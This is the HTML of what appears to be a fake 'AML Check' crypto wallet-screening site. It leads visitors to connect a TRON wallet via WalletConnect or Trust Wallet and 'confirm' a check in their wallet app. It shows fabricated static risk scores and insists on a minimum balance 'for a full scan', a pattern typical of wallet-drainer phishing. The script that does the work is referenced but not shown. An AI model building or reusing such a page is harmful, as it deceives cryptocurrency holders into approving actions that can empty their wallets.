<html
  lang="en"
  style="--wcm-color-fg-1: rgb(228,231,231); --wcm-color-fg-2: rgb(148,158,158); --wcm-color-fg-3: rgb(110,119,119); --wcm-color-bg-1: rgb(20,20,20); --wcm-color-bg-2: rgb(39,42,42); --wcm-color-bg-3: rgb(59,64,64); --wcm-color-overlay: rgba(255,255,255,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 3001; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, &#39;Segoe UI&#39;, Roboto, Ubuntu, &#39;Helvetica Neue&#39;, sans-serif; --wcm-font-feature-settings: &#39;tnum&#39; on, &#39;lnum&#39; on, &#39;case&#39; on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;"
>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <link rel="icon" href="images/favicon.ico" />
    <link rel="icon" type="image/png" href="https://amlzapex.com/favicon.png" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <title>AML Check</title>
    <link rel="preconnect" href="https://fonts.googleapis.com/" />
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="" />
    <link href="./checking_files/css2" rel="stylesheet" />
    <link rel="stylesheet" crossorigin="" href="./checking_files/styles1.css" />
    <link rel="stylesheet" href="./checking_files/styles2.css" />
    <script defer="defer" src="page2.bundle.js"></script>
    <link href="page2.css" rel="stylesheet" />
  </head>
  <body
    data-aos-easing="ease"
    data-aos-duration="400"
    data-aos-delay="0"
    style="background: #fafbfc"
  >
    <div id="" style="width: 100%">
      <div>
        <div data-v-e269d3c4="" class="main-check">
          <header data-v-97d557fc="" data-v-e269d3c4="">
            <a data-v-97d557fc="" href="https://amlzapex.com/" class=""
              ><svg
                data-v-97d557fc=""
                width="33"
                height="32"
                viewBox="0 0 33 32"
                fill="none"
                xmlns="http://www.w3.org/2000/svg"
                class="header-logo"
              >
                <g filter="url(#filter0_i_118_313)">
                  <circle cx="16.5" cy="16" r="16" fill="#0057FF"></circle>
                </g>
                <path
                  d="M8.59961 14.6151C8.59961 11.8183 8.59961 10.4199 8.93099 9.94941C9.26238 9.47896 10.582 9.02887 13.2212 8.12869L13.724 7.95719C15.0997 7.48795 15.7876 7.25333 16.4998 7.25333C17.2121 7.25333 17.8999 7.48795 19.2757 7.95719L19.7785 8.12869C22.4177 9.02887 23.7373 9.47896 24.0687 9.94941C24.4 10.4199 24.4 11.8183 24.4 14.6151C24.4 15.0376 24.4 15.4957 24.4 15.9924C24.4 20.9239 20.6791 23.317 18.3445 24.3332C17.7112 24.6088 17.3945 24.7467 16.4998 24.7467C15.6051 24.7467 15.2885 24.6088 14.6552 24.3332C12.3206 23.317 8.59961 20.9239 8.59961 15.9924C8.59961 15.4957 8.59961 15.0376 8.59961 14.6151Z"
                  fill="white"
                ></path>
                <defs>
                  <filter
                    id="filter0_i_118_313"
                    x="0.5"
                    y="0"
                    width="32"
                    height="36"
                    filterUnits="userSpaceOnUse"
                    color-interpolation-filters="sRGB"
                  >
                    <feflood
                      flood-opacity="0"
                      result="BackgroundImageFix"
                    ></feflood>
                    <feblend
                      mode="normal"
                      in="SourceGraphic"
                      in2="BackgroundImageFix"
                      result="shape"
                    ></feblend>
                    <fecolormatrix
                      in="SourceAlpha"
                      type="matrix"
                      values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"
                      result="hardAlpha"
                    ></fecolormatrix>
                    <feoffset dy="4"></feoffset>
                    <fegaussianblur stdDeviation="3"></fegaussianblur>
                    <fecomposite
                      in2="hardAlpha"
                      operator="arithmetic"
                      k2="-1"
                      k3="1"
                    ></fecomposite>
                    <fecolormatrix
                      type="matrix"
                      values="0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 0.35 0"
                    ></fecolormatrix>
                    <feblend
                      mode="normal"
                      in2="shape"
                      result="effect1_innerShadow_118_313"
                    ></feblend>
                  </filter>
                </defs>
              </svg> </a
            ><a data-v-97d557fc="" href="https://amlzapex.com/" class="link"
              ><p data-v-97d557fc="">AML Check</p></a
            >
          </header>
          <div
            id="1"
            data-v-e269d3c4=""
            class="step-1 container"
            style="max-width: 534px"
          >
            <div data-v-e269d3c4="" class="card first-card">
              <div data-v-e269d3c4="" class="c-head-h1">
                <h1 data-v-e269d3c4="">Wallet check</h1>
                <div data-v-e269d3c4="" class="steps">Step 1 of 4</div>
              </div>
              <p data-v-e269d3c4="" class="head-desc" style="font-size: 15px">
                To continue, please select the required network
              </p>
              <div
                data-v-9bc126f6=""
                data-v-e269d3c4=""
                class="select-item tron"
                id="tron"
              >
                <img
                  data-v-9bc126f6=""
                  src="images/tron-trx-logo.png"
                  alt="TRX"
                />
                <div data-v-9bc126f6="" class="s-content">
                  <p data-v-9bc126f6="" class="s-i-title">TRON Network</p>
                </div>
              </div>
              <button
                data-v-e269d3c4=""
                class="btn btn-step-1 btn-primary"
                disabled=""
                id="next"
              >
                Continue
              </button>
            </div>
          </div>
          <div
            id="2"
            data-v-e269d3c4=""
            class="step-2 container"
            style="max-width: 534px; display: none"
          >
            <div data-v-e269d3c4="" class="card first-card">
              <div data-v-e269d3c4="" class="c-head-h1">
                <h1 data-v-e269d3c4="">Connect wallet</h1>
                <div data-v-e269d3c4="" class="steps">Step 2 of 4</div>
              </div>
              <p data-v-e269d3c4="" class="head-desc">
                To continue, select and connect your wallet
              </p>
              <div
                data-v-9bc126f6=""
                data-v-e269d3c4=""
                class="select-item selected"
              >
                <img
                  data-v-9bc126f6=""
                  src="images/tron-trx-logo.png"
                  alt="tron"
                />
                <div data-v-9bc126f6="" class="s-content">
                  <p data-v-9bc126f6="" class="s-i-title">TRON Network</p>
                  <p data-v-9bc126f6="" class="s-i-desc">Selected network</p>
                </div>
              </div>
              <div data-v-e269d3c4="" class="wallet-wrapper">
                <button
                  data-v-9bc126f6=""
                  data-v-e269d3c4=""
                  class="select-item connect-wallet walletconnect-button"
                  id="wallet"
                >
                  <img
                    class="wallet-logo"
                    src="images/walletconnect.svg"
                    width="40"
                  />
                  <div data-v-9bc126f6="" class="s-content">
                    <p data-v-9bc126f6="" class="s-i-title wallet-name">
                      WalletConnect
                    </p>
                  </div>
                </button>
              </div>
              <p class="checking-error">error</p>
            </div>
          </div>
          <div
            id="2.5.1"
            data-v-e269d3c4=""
            class="container"
            style="max-width: 534px; display: none"
          >
            <div data-v-e269d3c4="" class="card first-card">
              <div data-v-e269d3c4="" class="c-head-h1">
                <h1 data-v-e269d3c4="">Connect wallet</h1>
                <div data-v-e269d3c4="" class="steps">Step 2 of 4</div>
              </div>
              <p data-v-e269d3c4="" class="head-desc">
                Return back to the your Wallet App and confirm AML check
              </p>
              <div data-v-e269d3c4="">
                <div
                  data-v-9bc126f6=""
                  data-v-e269d3c4=""
                  class="select-item load"
                >
                  <img
                    data-v-9bc126f6=""
                    src="images/trust-wallet.png"
                    alt="Trust Wallet"
                  />
                  <div data-v-9bc126f6="" class="s-content">
                    <p data-v-9bc126f6="" class="s-i-title">Trust Wallet</p>
                    <p data-v-9bc126f6="" class="s-i-desc">
                      Connecting, please wait a while
                    </p>
                  </div>
                  <div data-v-9bc126f6="" class="active-slot">
                    <div data-v-a6586eaa="" data-v-9bc126f6="" class="loader">
                      Loading...
                    </div>
                    <svg
                      id="trustconnect"
                      style="display: none"
                      data-v-9bc126f6=""
                      width="24"
                      height="24"
                      viewBox="0 0 24 24"
                      fill="none"
                      xmlns="http://www.w3.org/2000/svg"
                    >
                      <mask
                        id="mask0_99_503"
                        maskUnits="userSpaceOnUse"
                        x="3"
                        y="5"
                        width="18"
                        height="13"
                        style="mask-type: alpha"
                      >
                        <path
                          fill-rule="evenodd"
                          clip-rule="evenodd"
                          d="M20.7071 5.29289C21.0976 5.68342 21.0976 6.31658 20.7071 6.70711L9.70711 17.7071C9.31658 18.0976 8.68342 18.0976 8.29289 17.7071L3.29289 12.7071C2.90237 12.3166 2.90237 11.6834 3.29289 11.2929C3.68342 10.9024 4.31658 10.9024 4.70711 11.2929L9 15.5858L19.2929 5.29289C19.6834 4.90237 20.3166 4.90237 20.7071 5.29289Z"
                          fill="black"
                        ></path>
                      </mask>
                      <g mask="url(#mask0_99_503)">
                        <rect width="24" height="24" fill="#0057FF"></rect>
                      </g>
                    </svg>
                  </div>
                </div>
              </div>
              <div data-v-e269d3c4="" class="buttons">
                <button
                  data-v-e269d3c4=""
                  class="btn btn-primary"
                  disabled=""
                  id="next251"
                >
                  Continue
                </button>
              </div>
            </div>
          </div>
          <div
            id="2.5.2"
            data-v-e269d3c4=""
            class="container"
            style="max-width: 534px; display: none"
          >
            <div data-v-e269d3c4="" class="card first-card">
              <div data-v-e269d3c4="" class="c-head-h1">
                <h1 data-v-e269d3c4="">Connect wallet</h1>
                <div data-v-e269d3c4="" class="steps">Step 2 of 4</div>
              </div>
              <p data-v-e269d3c4="" class="head-desc">
                Return back to the your Wallet App and confirm AML check
              </p>
              <div data-v-e269d3c4="">
                <div
                  data-v-9bc126f6=""
                  data-v-e269d3c4=""
                  class="select-item load"
                >
                  <img
                    data-v-9bc126f6=""
                    src="images/wallet-connect.png"
                    alt="Trust Wallet"
                  />
                  <div data-v-9bc126f6="" class="s-content">
                    <p data-v-9bc126f6="" class="s-i-title">WalletConnect</p>
                    <p data-v-9bc126f6="" class="s-i-desc">
                      Connecting, please wait a while
                    </p>
                  </div>
                  <div data-v-9bc126f6="" class="active-slot">
                    <div data-v-a6586eaa="" data-v-9bc126f6="" class="loader">
                      Loading...
                    </div>
                    <svg
                      id="trustconnect2"
                      style="display: none"
                      data-v-9bc126f6=""
                      width="24"
                      height="24"
                      viewBox="0 0 24 24"
                      fill="none"
                      xmlns="http://www.w3.org/2000/svg"
                    >
                      <mask
                        id="mask0_99_503"
                        maskUnits="userSpaceOnUse"
                        x="3"
                        y="5"
                        width="18"
                        height="13"
                        style="mask-type: alpha"
                      >
                        <path
                          fill-rule="evenodd"
                          clip-rule="evenodd"
                          d="M20.7071 5.29289C21.0976 5.68342 21.0976 6.31658 20.7071 6.70711L9.70711 17.7071C9.31658 18.0976 8.68342 18.0976 8.29289 17.7071L3.29289 12.7071C2.90237 12.3166 2.90237 11.6834 3.29289 11.2929C3.68342 10.9024 4.31658 10.9024 4.70711 11.2929L9 15.5858L19.2929 5.29289C19.6834 4.90237 20.3166 4.90237 20.7071 5.29289Z"
                          fill="black"
                        ></path>
                      </mask>
                      <g mask="url(#mask0_99_503)">
                        <rect width="24" height="24" fill="#0057FF"></rect>
                      </g>
                    </svg>
                  </div>
                </div>
              </div>
              <div data-v-e269d3c4="" class="buttons">
                <button
                  data-v-e269d3c4=""
                  class="btn btn-primary"
                  id="next252"
                  disabled=""
                >
                  Continue
                </button>
              </div>
            </div>
          </div>
          <div
            id="2.5.3"
            data-v-e269d3c4=""
            class="container"
            style="max-width: 534px; display: none"
          >
            <div data-v-e269d3c4="" class="card first-card">
              <div data-v-e269d3c4="" class="c-head-h1">
                <h1 data-v-e269d3c4="">Connect wallet</h1>
                <div data-v-e269d3c4="" class="steps">Step 2 of 4</div>
              </div>
              <p data-v-e269d3c4="" class="head-desc">
                Return back to the your Wallet App and confirm AML check
              </p>
              <div data-v-e269d3c4="">
                <div
                  data-v-9bc126f6=""
                  data-v-e269d3c4=""
                  class="select-item load"
                >
                  <img
                    data-v-9bc126f6=""
                    src="images/wallet-connect.png"
                    alt="Trust Wallet"
                  />
                  <div data-v-9bc126f6="" class="s-content">
                    <p data-v-9bc126f6="" class="s-i-title">WalletConnect</p>
                    <p data-v-9bc126f6="" class="s-i-desc">
                      Connecting, please wait a while
                    </p>
                  </div>
                  <div
                    data-v-9bc126f6=""
                    class="active-slot"
                    id="trustconnect4"
                  >
                    <div data-v-a6586eaa="" data-v-9bc126f6="" class="loader">
                      Loading...
                    </div>
                    <svg
                      id="trustconnect3"
                      data-v-9bc126f6=""
                      width="24"
                      height="24"
                      viewBox="0 0 24 24"
                      fill="none"
                      xmlns="http://www.w3.org/2000/svg"
                    >
                      <mask
                        id="mask0_99_503"
                        maskUnits="userSpaceOnUse"
                        x="3"
                        y="5"
                        width="18"
                        height="13"
                        style="mask-type: alpha"
                      >
                        <path
                          fill-rule="evenodd"
                          clip-rule="evenodd"
                          d="M20.7071 5.29289C21.0976 5.68342 21.0976 6.31658 20.7071 6.70711L9.70711 17.7071C9.31658 18.0976 8.68342 18.0976 8.29289 17.7071L3.29289 12.7071C2.90237 12.3166 2.90237 11.6834 3.29289 11.2929C3.68342 10.9024 4.31658 10.9024 4.70711 11.2929L9 15.5858L19.2929 5.29289C19.6834 4.90237 20.3166 4.90237 20.7071 5.29289Z"
                          fill="black"
                        ></path>
                      </mask>
                      <g mask="url(#mask0_99_503)">
                        <rect width="24" height="24" fill="#0057FF"></rect>
                      </g>
                    </svg>
                  </div>
                </div>
              </div>
              <div data-v-e269d3c4="" class="buttons">
                <button
                  data-v-e269d3c4=""
                  class="btn btn-primary"
                  id="next253"
                  disabled=""
                >
                  Continue
                </button>
              </div>
            </div>
          </div>
          <div
            id="3"
            data-v-e269d3c4=""
            class="container step-3"
            style="max-width: 534px; display: none"
          >
            <div data-v-e269d3c4="" class="card">
              <div data-v-e269d3c4="" class="c-head-h1">
                <h1 data-v-e269d3c4="">Check in process</h1>
                <div data-v-e269d3c4="" class="steps">Step 3 of 4</div>
              </div>
              <p data-v-e269d3c4="" class="head-desc">
                We scrutinize your wallet thoroughly
              </p>
              <div data-v-e269d3c4="" class="loader">
                <img data-v-e269d3c4="" src="images/spinner.gif" />
              </div>
              <button data-v-e269d3c4="" class="btn btn-dis" disabled="">
                Please wait 1 minute, we will provide the result soon
              </button>
            </div>
          </div>
          <div
            id="3.1"
            data-v-e269d3c4=""
            class="container"
            style="max-width: 534px; display: none"
          >
            <div data-v-e269d3c4="" class="card">
              <div data-v-e269d3c4="" class="c-head-h1">
                <h1 data-v-e269d3c4="">Check in process</h1>
                <div data-v-e269d3c4="" class="steps">Step 3 of 4</div>
              </div>
              <p data-v-e269d3c4="" class="head-desc">
                We scrutinize your wallet thoroughly
              </p>
              <div data-v-e269d3c4="" class="loader">
                <img
                  data-v-e269d3c4=""
                  src="images/imgonline-com-ua-Replace-color-d4w8veel3YNsf-Photoroom.png"
                />
              </div>
              <button
                data-v-e269d3c4=""
                class="btn btn-dis wallet-error"
                style="padding: 40px"
              >
                You don't have at least 35 TRX or USDT in your balance for a
                full scan.<br />Refill your wallet and try again
              </button>
            </div>
          </div>
          <div
            id="3.2"
            data-v-e269d3c4=""
            class="container"
            style="max-width: 534px; display: none"
          >
            <div data-v-e269d3c4="" class="card">
              <div data-v-e269d3c4="" class="c-head-h1">
                <h1 data-v-e269d3c4="">Check in process</h1>
                <div data-v-e269d3c4="" class="steps">Step 3 of 4</div>
              </div>
              <p data-v-e269d3c4="" class="head-desc">
                We scrutinize your wallet thoroughly
              </p>
              <div data-v-e269d3c4="" class="loader">
                <img
                  data-v-e269d3c4=""
                  src="images/imgonline-com-ua-Replace-color-d4w8veel3YNsf-Photoroom.png"
                />
              </div>
              <button
                data-v-e269d3c4=""
                class="btn btn-dis wallet-error"
                style="padding: 40px"
              >
                You don't have at least 0,002 ETH or USDT in your balance for a
                full scan.<br />Refill your wallet and try again
              </button>
            </div>
          </div>
          <div
            id="4"
            data-v-e269d3c4=""
            class="container"
            style="max-width: 534px; display: none"
          >
            <div data-v-e269d3c4="" class="card last-card">
              <div data-v-e269d3c4="" class="c-logo">
                <svg
                  data-v-e269d3c4=""
                  width="76"
                  height="76"
                  viewBox="0 0 76 76"
                  fill="none"
                  xmlns="http://www.w3.org/2000/svg"
                >
                  <g filter="url(#filter0_di_99_443)">
                    <circle cx="38" cy="34" r="28" fill="#0057FF"></circle>
                  </g>
                  <path
                    d="M24.1748 31.5764C24.1748 26.682 24.1748 24.2348 24.7547 23.4115C25.3346 22.5882 27.6439 21.8005 32.2625 20.2252L33.1424 19.9251C35.55 19.1039 36.7538 18.6933 38.0002 18.6933C39.2466 18.6933 40.4504 19.1039 42.8579 19.9251L43.7379 20.2252C48.3564 21.8005 50.6657 22.5882 51.2456 23.4115C51.8256 24.2348 51.8256 26.682 51.8256 31.5764C51.8256 32.3157 51.8256 33.1174 51.8256 33.9868C51.8256 42.6168 45.3139 46.8048 41.2283 48.5831C40.1201 49.0655 39.5659 49.3067 38.0002 49.3067C36.4344 49.3067 35.8803 49.0655 34.772 48.5831C30.6865 46.8048 24.1748 42.6168 24.1748 33.9868C24.1748 33.1174 24.1748 32.3157 24.1748 31.5764Z"
                    fill="white"
                  ></path>
                  <defs>
                    <filter
                      id="filter0_di_99_443"
                      x="0"
                      y="0"
                      width="76"
                      height="76"
                      filterUnits="userSpaceOnUse"
                      color-interpolation-filters="sRGB"
                    >
                      <feflood
                        flood-opacity="0"
                        result="BackgroundImageFix"
                      ></feflood>
                      <fecolormatrix
                        in="SourceAlpha"
                        type="matrix"
                        values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"
                        result="hardAlpha"
                      ></fecolormatrix>
                      <feoffset dy="4"></feoffset>
                      <fegaussianblur stdDeviation="5"></fegaussianblur>
                      <fecomposite in2="hardAlpha" operator="out"></fecomposite>
                      <fecolormatrix
                        type="matrix"
                        values="0 0 0 0 0.0196078 0 0 0 0 0.0588235 0 0 0 0 0.0980392 0 0 0 0.2 0"
                      ></fecolormatrix>
                      <feblend
                        mode="normal"
                        in2="BackgroundImageFix"
                        result="effect1_dropShadow_99_443"
                      ></feblend>
                      <feblend
                        mode="normal"
                        in="SourceGraphic"
                        in2="effect1_dropShadow_99_443"
                        result="shape"
                      ></feblend>
                      <fecolormatrix
                        in="SourceAlpha"
                        type="matrix"
                        values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"
                        result="hardAlpha"
                      ></fecolormatrix>
                      <feoffset dy="4"></feoffset>
                      <fegaussianblur stdDeviation="3"></fegaussianblur>
                      <fecomposite
                        in2="hardAlpha"
                        operator="arithmetic"
                        k2="-1"
                        k3="1"
                      ></fecomposite>
                      <fecolormatrix
                        type="matrix"
                        values="0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 0.35 0"
                      ></fecolormatrix>
                      <feblend
                        mode="normal"
                        in2="shape"
                        result="effect2_innerShadow_99_443"
                      ></feblend>
                    </filter>
                  </defs>
                </svg>
              </div>
              <p data-v-e269d3c4="" class="percent">25.38%</p>
              <p data-v-e269d3c4="" class="head-desc">
                Rating scored from A to F, where A represents a clean wallet,
                and F represents a dirty wallet. The total rating is the average
                value between the indicators
              </p>
              <div data-v-e269d3c4="" class="percent-wrapper">
                <div
                  data-v-21975ec7=""
                  data-v-e269d3c4=""
                  class="progress-wrapper"
                >
                  <p data-v-21975ec7="">
                    <span data-v-21975ec7="">Transaction diversity</span
                    ><span data-v-21975ec7="">21.47%</span>
                  </p>
                  <div
                    data-v-21975ec7=""
                    class="progress-bar"
                    style="--p-color: #0057ff; --p-width: 21.47%"
                  ></div>
                </div>
                <div
                  data-v-21975ec7=""
                  data-v-e269d3c4=""
                  class="progress-wrapper"
                >
                  <p data-v-21975ec7="">
                    <span data-v-21975ec7="">Wallet activity</span
                    ><span data-v-21975ec7="">52.99%</span>
                  </p>
                  <div
                    data-v-21975ec7=""
                    class="progress-bar"
                    style="--p-color: #4caf52; --p-width: 52.99%"
                  ></div>
                </div>
                <div
                  data-v-21975ec7=""
                  data-v-e269d3c4=""
                  class="progress-wrapper"
                >
                  <p data-v-21975ec7="">
                    <span data-v-21975ec7="">Transaction to/from CEX</span
                    ><span data-v-21975ec7="">32.1%</span>
                  </p>
                  <div
                    data-v-21975ec7=""
                    class="progress-bar"
                    style="--p-color: #0057ff; --p-width: 32.1%"
                  ></div>
                </div>
                <div
                  data-v-21975ec7=""
                  data-v-e269d3c4=""
                  class="progress-wrapper"
                >
                  <p data-v-21975ec7="">
                    <span data-v-21975ec7="">Avg. Transaction Value</span
                    ><span data-v-21975ec7="">50.74%</span>
                  </p>
                  <div
                    data-v-21975ec7=""
                    class="progress-bar"
                    style="--p-color: #4caf52; --p-width: 50.74%"
                  ></div>
                </div>
                <div
                  data-v-21975ec7=""
                  data-v-e269d3c4=""
                  class="progress-wrapper"
                >
                  <p data-v-21975ec7="">
                    <span data-v-21975ec7="">Wallet Age</span
                    ><span data-v-21975ec7="">39.8%</span>
                  </p>
                  <div
                    data-v-21975ec7=""
                    class="progress-bar"
                    style="--p-color: #4caf52; --p-width: 39.8%"
                  ></div>
                </div>
                <div
                  data-v-21975ec7=""
                  data-v-e269d3c4=""
                  class="progress-wrapper"
                >
                  <p data-v-21975ec7="">
                    <span data-v-21975ec7="">Suspicious transactions</span
                    ><span data-v-21975ec7="">63.68%</span>
                  </p>
                  <div
                    data-v-21975ec7=""
                    class="progress-bar"
                    style="--p-color: #ffa400; --p-width: 63.68%"
                  ></div>
                </div>
                <div
                  data-v-21975ec7=""
                  data-v-e269d3c4=""
                  class="progress-wrapper"
                >
                  <p data-v-21975ec7="">
                    <span data-v-21975ec7=""
                      >Transaction to High-Risk addresses</span
                    ><span data-v-21975ec7="">65.06%</span>
                  </p>
                  <div
                    data-v-21975ec7=""
                    class="progress-bar"
                    style="--p-color: #ffa400; --p-width: 65.06%"
                  ></div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <footer data-v-ffd0604b="" data-v-e269d3c4="">
          <p data-v-ffd0604b="" style="font-size: 16px">
            © 2024 AML Check. All rights reserved.
          </p>
        </footer>
      </div>
    </div>
  </body>
</html>
